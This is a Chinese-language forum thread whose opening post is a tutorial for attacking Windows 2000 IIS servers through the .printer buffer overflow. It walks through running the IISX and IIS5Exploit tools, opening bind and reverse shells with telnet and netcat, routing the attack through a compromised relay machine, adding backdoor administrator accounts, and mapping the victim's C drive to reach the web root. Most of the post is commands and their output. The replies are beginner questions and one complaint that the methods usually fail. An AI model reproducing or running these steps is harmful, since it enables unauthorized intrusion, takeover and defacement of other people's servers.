|
 | 作者: jyt [jyt]
 论坛用户 |
登录 |
| 攻击系统:WIN 2000 攻击对象:".printer"应用程序映射存在缓冲溢出的WIN2000操作系统 使用工具:IISX(攻击中文2000系统) IIS5Exploit (攻击英文2000系统) 中文2000系统攻击方法: 攻击方法一: 把iisx.zip解压缩放到d:\目录下,DOS下,进入D盘 d:\iisx x.x.x.x 0 -p (注:这个0是表示没有安装sp服务,如果安装了就应该为1) sending shellcode... Now telnet to x.x.x.x 7788 这样,就在x.x.x.x主机上开了个7788的端口,然后: d:\telnet x.x.x.x 7788 Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\> 这样,进入了对方的主机,然后: c:\net user hehe hehe /add c:\net localgroup administrators hehe /add 这样,就增加了一个有管理员权限的帐号了,接下来怎么做,就不用我再多说了。 攻击方法二: d:\iisx x.x.x.x 0 -a sending shellcode... Now net use \\x.x.x.x\ipc$ "hax" /user:"hax" 这样成功的在对方的主机里增加了一个user&passwd:hax的帐号。接着: d:\net use \\x.x.x.x\ipc$ hax /user:hax 命令成功完成 这样就和对方主机建立了一个连接,然后: d:\net use o: \\x.x.x.x\c$ 这样我们把对方主机的C盘映射为自己的O盘了,然后窜到o:\inetpub\wwwroot目录里,嘿嘿,怎么做就我就不说了,NEXT! 攻击方法三: 这种方法是运用肉鸡来进行攻击,稍显麻烦点,但是安全性是最高的! 首先找台2000的肉鸡,IP为1.1.1.1,把iisx.exe和nc.exe传上去,然后再TELNET上去: Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\>nc -vv -l -p 5432 这样是在本机上开了个5432的端口,然后: c:\iisx x.x.x.x 0 -r 1.1.1.1 5432 这个时候,x.x.x.x就会和1.1.1.1建立了一个连接,telnet上去: c:\telnet x.x.x.x 5432 Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\> 这样就成功进入x.x.x.x主机系统了,呵呵,开几个帐号吧: c:\net user hehe hehe /add c:\net localgroup administrators hehe /add 这样就获取了对方主机的管理员权限。 WIN2000英文系统攻击方法: 1、首先在本机用NC开一个监听端口. C:\>nc -l -p 99 2、运行IIS5Exploit D:\>iis5exploit xxx.xxx.xxx.xxx 1.1.1.1 99 ===========IIS5 English Version .Printer Exploit.=========== ===Written by Assassin 1995-2001. http://www.netXeyes.com=== Connecting 1.1.1.1 ...OK. Send Shell Code ...OK IIS5 Shell Code Send OK 其中1.1.1.1指向本地IP. 稍等片刻,如果成功在本机NC监听的端口出现: C:\>nc -l -p 99 Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\> 可以执行命令.如: C:\>net user hehe hehe /add The command completed successfully. C:\>net localgroup administrartors hehe /add The command completed successful |
| 地主 发表时间: 03/27 00:52 |
 | 回复: xjy [xjy] 论坛用户 |
登录 |
|
你好,我是一个新手,现在很多东西,我还不懂不过我很想知道 你所说的“iisx.zip”是什么,在哪里打到? |
| B1层 发表时间: 03/27 10:47 |
 | 回复: koala [koala] 论坛用户 |
登录 |
|
为什么名字叫NT呢?不是攻击2000的吗? 还有NC是什么啊 |
| B2层 发表时间: 03/29 12:27 |
 | 回复: aa11 [aa11]  论坛用户 |
登录 |
|
我只想说的是~ 十之八九都不成功~~ 这只是对于我来说啦~~ |
| B3层 发表时间: 03/29 13:33 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: NT攻击教程(.printer远程溢出漏洞攻击方法)